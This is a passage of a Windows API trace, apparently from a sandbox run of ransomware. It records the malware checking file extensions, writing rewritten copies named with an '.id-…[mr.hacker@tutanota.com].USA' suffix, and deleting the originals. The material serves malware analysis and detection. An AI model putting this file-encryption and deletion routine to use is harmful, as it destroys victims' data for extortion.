lstrlenW (lpString=".docx") returned 5 [0047.121] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0047.121] lstrlenW (lpString=".pdf") returned 4 [0047.121] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0047.121] lstrlenW (lpString=".xls") returned 4 [0047.121] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0047.121] lstrlenW (lpString=".xlsx") returned 5 [0047.121] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0047.121] lstrlenW (lpString=".ppt") returned 4 [0047.121] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0047.121] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\THMBNAIL.PNG") returned 75 [0047.121] lstrlenW (lpString=".zip") returned 4 [0047.121] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0047.121] lstrlenW (lpString=".rar") returned 4 [0047.121] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0047.121] lstrlenW (lpString=".bz2") returned 4 [0047.121] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0047.122] lstrlenW (lpString=".7z") returned 3 [0047.122] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0047.122] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\THMBNAIL.PNG") returned 75 [0047.122] lstrlenW (lpString=".dbf") returned 4 [0047.122] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0047.122] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\THMBNAIL.PNG") returned 75 [0047.122] lstrlenW (lpString=".1cd") returned 4 [0047.122] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0047.122] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\THMBNAIL.PNG") returned 75 [0047.122] lstrlenW (lpString=".jpg") returned 4 [0047.122] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0047.122] lstrcmpiW (lpString1=".GIF", lpString2=".USA") returned -1 [0047.122] lstrlenW (lpString="PREVIEW.GIF") returned 11 [0047.122] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\network\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1ec [0047.122] GetFileSizeEx (in: hFile=0x1ec, lpFileSize=0x2aaff1c | out: lpFileSize=0x2aaff1c*=1364) returned 1 [0047.122] CloseHandle (hObject=0x1ec) returned 1 [0047.122] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\network\\preview.gif")) returned 0x20 [0047.123] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\PREVIEW.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\network\\preview.gif.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0047.123] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\network\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1ec [0047.123] SetFilePointerEx (in: hFile=0x1ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0047.123] SetFilePointerEx (in: hFile=0x1ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0047.123] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\PREVIEW.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\network\\preview.gif.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0047.124] GetLastError () returned 0x0 [0047.124] ReadFile (in: hFile=0x1ec, lpBuffer=0x3070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2aafed4*=0x554, lpOverlapped=0x0) returned 1 [0047.126] WriteFile (in: hFile=0x160, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x560, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2aafc9c*=0x560, lpOverlapped=0x0) returned 1 [0047.130] ReadFile (in: hFile=0x1ec, lpBuffer=0x3070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2aafed4*=0x0, lpOverlapped=0x0) returned 1 [0047.130] WriteFile (in: hFile=0x160, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2aafc9c*=0xea, lpOverlapped=0x0) returned 1 [0047.130] SetEndOfFile (hFile=0x160) returned 1 [0047.130] CloseHandle (hObject=0x160) returned 1 [0047.130] SetFilePointerEx (in: hFile=0x1ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0047.130] SetEndOfFile (hFile=0x1ec) returned 1 [0047.131] CloseHandle (hObject=0x1ec) returned 1 [0047.131] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\PREVIEW.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0047.131] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\network\\preview.gif")) returned 1 [0047.131] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\PREVIEW.GIF") returned 75 [0047.131] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\PREVIEW.GIF") returned 75 [0047.131] lstrlenW (lpString=".doc") returned 4 [0047.131] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0047.131] lstrlenW (lpString=".docx") returned 5 [0047.131] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0047.131] lstrlenW (lpString=".pdf") returned 4 [0047.131] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0047.131] lstrlenW (lpString=".xls") returned 4 [0047.131] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0047.131] lstrlenW (lpString=".xlsx") returned 5 [0047.131] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0047.132] lstrlenW (lpString=".ppt") returned 4 [0047.132] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0047.132] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\PREVIEW.GIF") returned 75 [0047.132] lstrlenW (lpString=".zip") returned 4 [0047.132] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0047.132] lstrlenW (lpString=".rar") returned 4 [0047.132] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0047.132] lstrlenW (lpString=".bz2") returned 4 [0047.132] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0047.132] lstrlenW (lpString=".7z") returned 3 [0047.132] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0047.132] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\PREVIEW.GIF") returned 75 [0047.132] lstrlenW (lpString=".dbf") returned 4 [0047.132] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0047.132] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\PREVIEW.GIF") returned 75 [0047.132] lstrlenW (lpString=".1cd") returned 4 [0047.132] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0047.132] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\PREVIEW.GIF") returned 75 [0047.132] lstrlenW (lpString=".jpg") returned 4 [0047.132] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0047.132] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\PREVIEW.GIF") returned 75 [0047.132] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\PREVIEW.GIF") returned 75 [0047.132] lstrlenW (lpString=".doc") returned 4 [0047.132] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0047.132] lstrlenW (lpString=".docx") returned 5 [0047.132] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0047.132] lstrlenW (lpString=".pdf") returned 4 [0047.132] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0047.132] lstrlenW (lpString=".xls") returned 4 [0047.132] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0047.132] lstrlenW (lpString=".xlsx") returned 5 [0047.132] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0047.132] lstrlenW (lpString=".ppt") returned 4 [0047.132] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0047.133] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\PREVIEW.GIF") returned 75 [0047.133] lstrlenW (lpString=".zip") returned 4 [0047.133] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0047.133] lstrlenW (lpString=".rar") returned 4 [0047.133] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0047.133] lstrlenW (lpString=".bz2") returned 4 [0047.133] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0047.133] lstrlenW (lpString=".7z") returned 3 [0047.133] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0047.133] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\PREVIEW.GIF") returned 75 [0047.133] lstrlenW (lpString=".dbf") returned 4 [0047.133] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0047.133] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\PREVIEW.GIF") returned 75 [0047.133] lstrlenW (lpString=".1cd") returned 4 [0047.133] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0047.133] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\PREVIEW.GIF") returned 75 [0047.133] lstrlenW (lpString=".jpg") returned 4 [0047.133] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0047.133] lstrcmpiW (lpString1=".PNG", lpString2=".USA") returned -1 [0047.133] lstrlenW (lpString="THMBNAIL.PNG") returned 12 [0047.133] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\network\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1ec [0047.134] GetFileSizeEx (in: hFile=0x1ec, lpFileSize=0x2aaff1c | out: lpFileSize=0x2aaff1c*=11573) returned 1 [0047.134] CloseHandle (hObject=0x1ec) returned 1 [0047.134] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\network\\thmbnail.png")) returned 0x20 [0047.134] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\THMBNAIL.PNG.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\network\\thmbnail.png.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0047.134] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\network\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1ec [0047.134] SetFilePointerEx (in: hFile=0x1ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0047.134] SetFilePointerEx (in: hFile=0x1ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0047.134] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\THMBNAIL.PNG.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\network\\thmbnail.png.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0047.134] GetLastError () returned 0x0 [0047.134] ReadFile (in: hFile=0x1ec, lpBuffer=0x3070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2aafed4*=0x2d35, lpOverlapped=0x0) returned 1 [0047.136] WriteFile (in: hFile=0x160, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x2d40, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2aafc9c*=0x2d40, lpOverlapped=0x0) returned 1 [0047.137] ReadFile (in: hFile=0x1ec, lpBuffer=0x3070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2aafed4*=0x0, lpOverlapped=0x0) returned 1 [0047.137] WriteFile (in: hFile=0x160, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2aafc9c*=0xec, lpOverlapped=0x0) returned 1 [0047.137] SetEndOfFile (hFile=0x160) returned 1 [0047.137] CloseHandle (hObject=0x160) returned 1 [0047.137] SetFilePointerEx (in: hFile=0x1ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0047.137] SetEndOfFile (hFile=0x1ec) returned 1 [0047.138] CloseHandle (hObject=0x1ec) returned 1 [0047.138] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\THMBNAIL.PNG.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0047.138] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\network\\thmbnail.png")) returned 1 [0047.139] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\THMBNAIL.PNG") returned 76 [0047.139] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\THMBNAIL.PNG") returned 76 [0047.139] lstrlenW (lpString=".doc") returned 4 [0047.139] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0047.139] lstrlenW (lpString=".docx") returned 5 [0047.139] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0047.139] lstrlenW (lpString=".pdf") returned 4 [0047.139] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0047.139] lstrlenW (lpString=".xls") returned 4 [0047.139] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0047.139] lstrlenW (lpString=".xlsx") returned 5 [0047.139] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0047.139] lstrlenW (lpString=".ppt") returned 4 [0047.139] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0047.139] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\THMBNAIL.PNG") returned 76 [0047.139] lstrlenW (lpString=".zip") returned 4 [0047.139] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0047.139] lstrlenW (lpString=".rar") returned 4 [0047.139] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0047.139] lstrlenW (lpString=".bz2") returned 4 [0047.139] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0047.139] lstrlenW (lpString=".7z") returned 3 [0047.139] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0047.139] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\THMBNAIL.PNG") returned 76 [0047.139] lstrlenW (lpString=".dbf") returned 4 [0047.139] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0047.139] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\THMBNAIL.PNG") returned 76 [0047.139] lstrlenW (lpString=".1cd") returned 4 [0047.139] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0047.139] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\THMBNAIL.PNG") returned 76 [0047.139] lstrlenW (lpString=".jpg") returned 4 [0047.139] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0047.139] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\THMBNAIL.PNG") returned 76 [0047.139] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\THMBNAIL.PNG") returned 76 [0047.139] lstrlenW (lpString=".doc") returned 4 [0047.140] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0047.140] lstrlenW (lpString=".docx") returned 5 [0047.140] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0047.140] lstrlenW (lpString=".pdf") returned 4 [0047.140] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0047.140] lstrlenW (lpString=".xls") returned 4 [0047.140] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0047.140] lstrlenW (lpString=".xlsx") returned 5 [0047.140] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0047.140] lstrlenW (lpString=".ppt") returned 4 [0047.140] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0047.140] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\THMBNAIL.PNG") returned 76 [0047.140] lstrlenW (lpString=".zip") returned 4 [0047.140] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0047.140] lstrlenW (lpString=".rar") returned 4 [0047.140] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0047.140] lstrlenW (lpString=".bz2") returned 4 [0047.140] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0047.140] lstrlenW (lpString=".7z") returned 3 [0047.140] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0047.140] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\THMBNAIL.PNG") returned 76 [0047.140] lstrlenW (lpString=".dbf") returned 4 [0047.140] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0047.140] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\THMBNAIL.PNG") returned 76 [0047.140] lstrlenW (lpString=".1cd") returned 4 [0047.140] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0047.140] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\THMBNAIL.PNG") returned 76 [0047.140] lstrlenW (lpString=".jpg") returned 4 [0047.140] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0047.140] lstrcmpiW (lpString1=".GIF", lpString2=".USA") returned -1 [0047.140] lstrlenW (lpString="PREVIEW.GIF") returned 11 [0047.141] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\papyrus\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1ec [0047.141] GetFileSizeEx (in: hFile=0x1ec, lpFileSize=0x2aaff1c | out: lpFileSize=0x2aaff1c*=2574) returned 1 [0047.141] CloseHandle (hObject=0x1ec) returned 1 [0047.141] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\papyrus\\preview.gif")) returned 0x20 [0047.141] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\PREVIEW.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\papyrus\\preview.gif.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0047.141] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\papyrus\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1ec [0047.141] SetFilePointerEx (in: hFile=0x1ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0047.141] SetFilePointerEx (in: hFile=0x1ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0047.141] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\PREVIEW.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\papyrus\\preview.gif.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x204 [0047.202] GetLastError () returned 0x0 [0047.202] ReadFile (in: hFile=0x1ec, lpBuffer=0x3070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2aafed4*=0xa0e, lpOverlapped=0x0) returned 1 [0047.220] WriteFile (in: hFile=0x204, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xa10, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2aafc9c*=0xa10, lpOverlapped=0x0) returned 1 [0047.230] ReadFile (in: hFile=0x1ec, lpBuffer=0x3070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2aafed4*=0x0, lpOverlapped=0x0) returned 1 [0047.230] WriteFile (in: hFile=0x204, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2aafc9c*=0xea, lpOverlapped=0x0) returned 1 [0047.230] SetEndOfFile (hFile=0x204) returned 1 [0047.230] CloseHandle (hObject=0x204) returned 1 [0047.232] SetFilePointerEx (in: hFile=0x1ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0047.232] SetEndOfFile (hFile=0x1ec) returned 1 [0047.233] CloseHandle (hObject=0x1ec) returned 1 [0047.233] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\PREVIEW.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0047.233] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\papyrus\\preview.gif")) returned 1 [0047.234] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\PREVIEW.GIF") returned 75 [0047.234] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\PREVIEW.GIF") returned 75 [0047.234] lstrlenW (lpString=".doc") returned 4 [0047.234] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0047.234] lstrlenW (lpString=".docx") returned 5 [0047.234] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0047.234] lstrlenW (lpString=".pdf") returned 4 [0047.234] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0047.234] lstrlenW (lpString=".xls") returned 4 [0047.234] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0047.234] lstrlenW (lpString=".xlsx") returned 5 [0047.234] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0047.234] lstrlenW (lpString=".ppt") returned 4 [0047.234] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0047.234] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\PREVIEW.GIF") returned 75 [0047.234] lstrlenW (lpString=".zip") returned 4 [0047.234] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0047.234] lstrlenW (lpString=".rar") returned 4 [0047.234] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0047.234] lstrlenW (lpString=".bz2") returned 4 [0047.234] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0047.234] lstrlenW (lpString=".7z") returned 3 [0047.234] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0047.234] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\PREVIEW.GIF") returned 75 [0047.234] lstrlenW (lpString=".dbf") returned 4 [0047.234] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0047.234] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\PREVIEW.GIF") returned 75 [0047.234] lstrlenW (lpString=".1cd") returned 4 [0047.234] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0047.234] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\PREVIEW.GIF") returned 75 [0047.234] lstrlenW (lpString=".jpg") returned 4 [0047.234] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0047.235] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\PREVIEW.GIF") returned 75 [0047.235] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\PREVIEW.GIF") returned 75 [0047.235] lstrlenW (lpString=".doc") returned 4 [0047.235] lstrcmpiW 